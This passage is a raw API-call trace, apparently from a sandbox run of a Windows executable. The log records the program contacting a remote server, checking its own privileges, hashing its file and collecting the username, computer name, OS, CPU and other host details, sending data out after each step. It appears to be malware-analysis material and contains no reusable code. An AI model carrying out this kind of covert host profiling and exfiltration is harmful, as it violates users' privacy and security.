HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0044.359] WriteFile (in: hFile=0x23c, lpBuffer=0x2617ea8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x516fe8c, lpOverlapped=0x0 | out: lpBuffer=0x2617ea8*, lpNumberOfBytesWritten=0x516fe8c*=0x270, lpOverlapped=0x0) returned 1 [0044.360] FlushFileBuffers (hFile=0x23c) returned 1 [0044.361] CloseHandle (hObject=0x23c) returned 1 [0044.362] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0044.366] wcslen (_String="transport") returned 0x9 [0044.366] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\transport" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\transport")) returned 0xffffffff [0044.367] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0x0) returned 0x102 [0044.367] GetCurrentThreadId () returned 0xac0 [0044.367] getpeername (in: s=0x214, name=0x516fe80, namelen=0x516fe7c | out: name=0x516fe80*(sa_family=2, sin_port=0x1bb, sin_addr="192.99.181.10"), namelen=0x516fe7c) returned 0 [0044.367] strlen (_Str="core") returned 0x4 [0044.367] strlen (_Str="core") returned 0x4 [0044.367] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0044.367] GetCurrentThreadId () returned 0xac0 [0044.367] WSARecv (in: s=0x214, lpBuffers=0x516fee0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fee0*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0044.367] GetLastError () returned 0x3e5 [0044.367] GetCurrentThreadId () returned 0xac0 [0044.367] WSASend (in: s=0x214, lpBuffers=0x516fec8*=((len=0x51, buf=0x2625908*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fec8*=((len=0x51, buf=0x2625908*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0044.368] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0044.368] GetCurrentThreadId () returned 0xac0 [0044.368] WSASend (in: s=0x214, lpBuffers=0x516fec8*=((len=0x28, buf=0x261f740*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fec8*=((len=0x28, buf=0x261f740*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0044.368] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0044.368] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0044.593] SetEvent (hEvent=0x230) returned 1 [0044.593] SetEvent (hEvent=0x234) returned 1 [0044.593] strlen (_Str="http://httpbin.org/ip") returned 0x15 [0044.593] strlen (_Str="http") returned 0x4 [0044.593] _snprintf (in: _Dest=0x516fe40, _Count=0x17, _Format="%d" | out: _Dest="80") returned 2 [0044.593] strlen (_Str="80") returned 0x2 [0044.593] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4dd58fc, lpParameter=0x2601c78, dwCreationFlags=0x0, lpThreadId=0x2601c80 | out: lpThreadId=0x2601c80*=0xacc) returned 0x244 [0044.593] GetCurrentThreadId () returned 0xac0 [0044.593] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0044.593] GetLastError () returned 0x3e5 [0044.593] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0045.108] SetEvent (hEvent=0x230) returned 1 [0045.108] SetEvent (hEvent=0x234) returned 1 [0045.109] strlen (_Str="17f260ff02e5") returned 0xc [0045.109] WSASend (in: s=0x214, lpBuffers=0x516fda4*=((len=0x5a, buf=0x26268a8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fda4*=((len=0x5a, buf=0x26268a8*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0045.109] GetCurrentThreadId () returned 0xac0 [0045.110] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0045.110] GetLastError () returned 0x3e5 [0045.110] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0045.110] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] strlen (_Str="core.installed_file") returned 0x13 [0045.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pst790mv.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0045.349] GetFileSize (in: hFile=0x2a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7e600 [0045.349] ReadFile (in: hFile=0x2a8, lpBuffer=0x2627890, nNumberOfBytesToRead=0x7e600, lpNumberOfBytesRead=0x516fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2627890*, lpNumberOfBytesRead=0x516fe7c*=0x7e600, lpOverlapped=0x0) returned 1 [0045.354] CryptAcquireContextW (in: phProv=0x2fa98, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2fa98*=0x2dba160) returned 1 [0045.354] CryptAcquireContextW (in: phProv=0x2fa98, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2fa98*=0x2dba370) returned 1 [0045.355] CryptCreateHash (in: hProv=0x2dba370, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x2fa9c | out: phHash=0x2fa9c) returned 1 [0045.355] CryptHashData (hHash=0x2da41b0, pbData=0x2627890, dwDataLen=0x7e600, dwFlags=0x0) returned 1 [0045.356] CryptGetHashParam (in: hHash=0x2da41b0, dwParam=0x4, pbData=0x516fda8, pdwDataLen=0x516fdac, dwFlags=0x0 | out: pbData=0x516fda8, pdwDataLen=0x516fdac) returned 1 [0045.356] CryptGetHashParam (in: hHash=0x2da41b0, dwParam=0x2, pbData=0x2601270, pdwDataLen=0x516fdac, dwFlags=0x0 | out: pbData=0x2601270, pdwDataLen=0x516fdac) returned 1 [0045.356] CryptDestroyHash (hHash=0x2da41b0) returned 1 [0045.356] CryptReleaseContext (hProv=0x2dba370, dwFlags=0x0) returned 1 [0045.358] CloseHandle (hObject=0x2a8) returned 1 [0045.358] wcslen (_String="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe") returned 0x3d [0045.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0045.358] strlen (_Str="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe") returned 0x3d [0045.358] strlen (_Str="FABEC36AEDBCCF2C7A5B0C0E7E8EC7EA64A6A505") returned 0x28 [0045.359] WSASend (in: s=0x214, lpBuffers=0x516fd20*=((len=0xb3, buf=0x2627890*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd20*=((len=0xb3, buf=0x2627890*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0045.359] GetCurrentThreadId () returned 0xac0 [0045.359] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0045.359] GetLastError () returned 0x3e5 [0045.359] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0045.359] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0045.592] GetModuleHandleW (lpModuleName=0x0) returned 0x4dd0000 [0045.592] GetCurrentProcess () returned 0xffffffff [0045.592] GetModuleBaseNameA (in: hProcess=0xffffffff, hModule=0x4dd0000, lpBaseName=0x516fd38, nSize=0x103 | out: lpBaseName="pST790mv.exe") returned 0xc [0045.592] strlen (_Str="pST790mv.exe") returned 0xc [0045.592] GetUserNameW (in: lpBuffer=0x516fb30, pcbBuffer=0x516fe54 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x516fe54) returned 1 [0045.593] wcslen (_String="5p5NrGJn0jS HALPmcxz") returned 0x14 [0045.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5p5NrGJn0jS HALPmcxz", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0045.593] strlen (_Str="5p5NrGJn0jS HALPmcxz") returned 0x14 [0045.593] AllocateAndInitializeSid (in: pIdentifierAuthority=0x516fb14, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x516fb1c | out: pSid=0x516fb1c*=0x2c502b8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0045.593] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x2c502b8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x516fb20 | out: IsMember=0x516fb20) returned 1 [0045.593] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0045.593] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0045.593] VerifyVersionInfoA (in: lpVersionInformation=0x516fa80, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x516fa80) returned 1 [0045.593] GetCurrentProcess () returned 0xffffffff [0045.593] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x18, TokenHandle=0x516fb10 | out: TokenHandle=0x516fb10*=0x2b4) returned 1 [0045.593] GetTokenInformation (in: TokenHandle=0x2b4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x516fb0c | out: TokenInformation=0x0, ReturnLength=0x516fb0c) returned 0 [0045.594] GetLastError () returned 0x7a [0045.594] GetTokenInformation (in: TokenHandle=0x2b4, TokenInformationClass=0x19, TokenInformation=0x2601270, TokenInformationLength=0x14, ReturnLength=0x516fb0c | out: TokenInformation=0x2601270, ReturnLength=0x516fb0c) returned 1 [0045.594] GetSidSubAuthorityCount (pSid=0x2601278*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2601279 [0045.594] GetSidSubAuthority (pSid=0x2601278*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2601280 [0045.594] CloseHandle (hObject=0x2b4) returned 1 [0045.594] WSASend (in: s=0x214, lpBuffers=0x516fda0*=((len=0x6b, buf=0x2622400*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fda0*=((len=0x6b, buf=0x2622400*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0045.594] GetCurrentThreadId () returned 0xac0 [0045.594] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0045.594] GetLastError () returned 0x3e5 [0045.594] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0045.594] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0045.826] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x101, phkResult=0x516fb9c | out: phkResult=0x516fb9c*=0x2b4) returned 0x0 [0045.826] RegQueryValueExA (in: hKey=0x2b4, lpValueName="CurrentMajorVersionNumber", lpReserved=0x0, lpType=0x0, lpData=0x516fc04, lpcbData=0x516fb98*=0x4 | out: lpType=0x0, lpData=0x516fc04*=0x0, lpcbData=0x516fb98*=0x4) returned 0x2 [0045.826] RegQueryValueExA (in: hKey=0x2b4, lpValueName="CurrentVersion", lpReserved=0x0, lpType=0x0, lpData=0x516fc04, lpcbData=0x516fb98*=0x208 | out: lpType=0x0, lpData=0x516fc04*=0x36, lpcbData=0x516fb98*=0x4) returned 0x0 [0045.826] RegQueryValueExA (in: hKey=0x2b4, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x516fc04, lpcbData=0x516fb98*=0x208 | out: lpType=0x0, lpData=0x516fc04*=0x57, lpcbData=0x516fb98*=0x17) returned 0x0 [0045.827] RegQueryValueExA (in: hKey=0x2b4, lpValueName="CSDVersion", lpReserved=0x0, lpType=0x0, lpData=0x516fc04, lpcbData=0x516fb98*=0x208 | out: lpType=0x0, lpData=0x516fc04*=0x53, lpcbData=0x516fb98*=0xf) returned 0x0 [0045.827] RegQueryValueExA (in: hKey=0x2b4, lpValueName="CurrentBuildNumber", lpReserved=0x0, lpType=0x0, lpData=0x516fc04, lpcbData=0x516fb98*=0x208 | out: lpType=0x0, lpData=0x516fc04*=0x37, lpcbData=0x516fb98*=0x5) returned 0x0 [0045.827] RegCloseKey (hKey=0x2b4) returned 0x0 [0045.827] GetCurrentProcess () returned 0xffffffff [0045.828] GetModuleHandleA (lpModuleName="kernel32") returned 0x76600000 [0045.828] GetProcAddress (hModule=0x76600000, lpProcName="IsWow64Process") returned 0x7661195e [0045.828] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x516fb68 | out: Wow64Process=0x516fb68) returned 1 [0045.828] GetCurrentProcess () returned 0xffffffff [0045.829] GetModuleHandleA (lpModuleName="kernel32") returned 0x76600000 [0045.829] GetProcAddress (hModule=0x76600000, lpProcName="IsWow64Process") returned 0x7661195e [0045.829] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x516fe0c | out: Wow64Process=0x516fe0c) returned 1 [0045.829] strlen (_Str="6.1") returned 0x3 [0045.829] strlen (_Str="Windows 7 Professional Service Pack 1 (build 7601), 64bits") returned 0x3a [0045.829] GetLocaleInfoA (in: Locale=0x800, LCType=0x5a, lpLCData=0x516fcd4, cchData=260 | out: lpLCData="US") returned 3 [0045.829] strlen (_Str="US") returned 0x2 [0045.829] GetLocaleInfoA (in: Locale=0x800, LCType=0x59, lpLCData=0x516fcd4, cchData=260 | out: lpLCData="en") returned 3 [0045.830] strlen (_Str="en") returned 0x2 [0045.830] GetComputerNameW (in: lpBuffer=0x516facc, nSize=0x516fe00 | out: lpBuffer="XDUWTFONO", nSize=0x516fe00) returned 1 [0045.830] wcslen (_String="XDUWTFONO") returned 0x9 [0045.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XDUWTFONO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0045.830] strlen (_Str="XDUWTFONO") returned 0x9 [0045.830] GetDC (hWnd=0x0) returned 0x0 [0045.830] GetDesktopWindow () returned 0x10010 [0045.830] GetWindowRect (in: hWnd=0x10010, lpRect=0x516f990 | out: lpRect=0x516f990) returned 1 [0045.830] _snprintf (in: _Dest=0x516f9a8, _Count=0x103, _Format="%d x %d" | out: _Dest="1440 x 900") returned 10 [0045.831] strlen (_Str="1440 x 900") returned 0xa [0045.831] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x516f97c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x516f97c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0045.831] GetSystemInfo (in: lpSystemInfo=0x516f830 | out: lpSystemInfo=0x516f830*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0045.831] GlobalMemoryStatusEx (in: lpBuffer=0x516f860 | out: lpBuffer=0x516f860) returned 1 [0045.831] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x101, phkResult=0x516f814 | out: phkResult=0x516f814*=0x2b0) returned 0x0 [0045.831] RegQueryValueExA (in: hKey=0x2b0, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x516f8a4, lpcbData=0x516f810*=0x208 | out: lpType=0x0, lpData=0x516f8a4*=0x49, lpcbData=0x516f810*=0x2a) returned 0x0 [0045.831] strlen (_Str="Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHz") returned 0x29 [0045.832] RegQueryValueExA (in: hKey=0x2b0, lpValueName="VendorIdentifier", lpReserved=0x0, lpType=0x0, lpData=0x516f8a4, lpcbData=0x516f810*=0x208 | out: lpType=0x0, lpData=0x516f8a4*=0x47, lpcbData=0x516f810*=0xd) returned 0x0 [0045.832] strlen (_Str="GenuineIntel") returned 0xc [0045.832] RegQueryValueExA (in: hKey=0x2b0, lpValueName="~MHz", lpReserved=0x0, lpType=0x0, lpData=0x516f818, lpcbData=0x516f810*=0x4 | out: lpType=0x0, lpData=0x516f818*=0x10, lpcbData=0x516f810*=0x4) returned 0x0 [0045.832] RegCloseKey (hKey=0x2b0) returned 0x0 [0045.832] NetWkstaGetInfo (in: servername=0x0, level=0x66, bufptr=0x516fe14 | out: bufptr=0x516fe14) returned 0x0 [0045.833] wcslen (_String="WORKGROUP") returned 0x9 [0045.833] wcslen (_String="WORKGROUP") returned 0x9 [0045.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WORKGROUP", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0045.833] strlen (_Str="WORKGROUP") returned 0x9 [0045.833] NetApiBufferFree (Buffer=0x2dbdc58) returned 0x0 [0045.833] WSASend (in: s=0x214, lpBuffers=0x516fda4*=((len=0x123, buf=0x2628990*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fda4*=((len=0x123, buf=0x2628990*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0045.833] GetCurrentThreadId () returned 0xac0 [0045.833] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0045.833] GetLastError () returned 0x3e5 [0045.833] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0045.834] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.067] WSASend (in: s=0x214, lpBuffers=0x516fdc0*=((len=0x28, buf=0x2618290*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fdc0*=((len=0x28, buf=0x2618290*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0046.067] GetCurrentThreadId () returned 0xac0 [0046.067] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0046.067] GetLastError () returned 0x3e5 [0046.067] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.067] WSASend (in: s=0x214, lpBuffers=0x516fec8*=((len=0x2b, buf=0x2620c70*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fec8*=((len=0x2b, buf=0x2620c70*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0046.067] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.067] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0046.334] GetSystemInfo (in: lpSystemInfo=0x516fe68 | out: lpSystemInfo=0x516fe68*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, 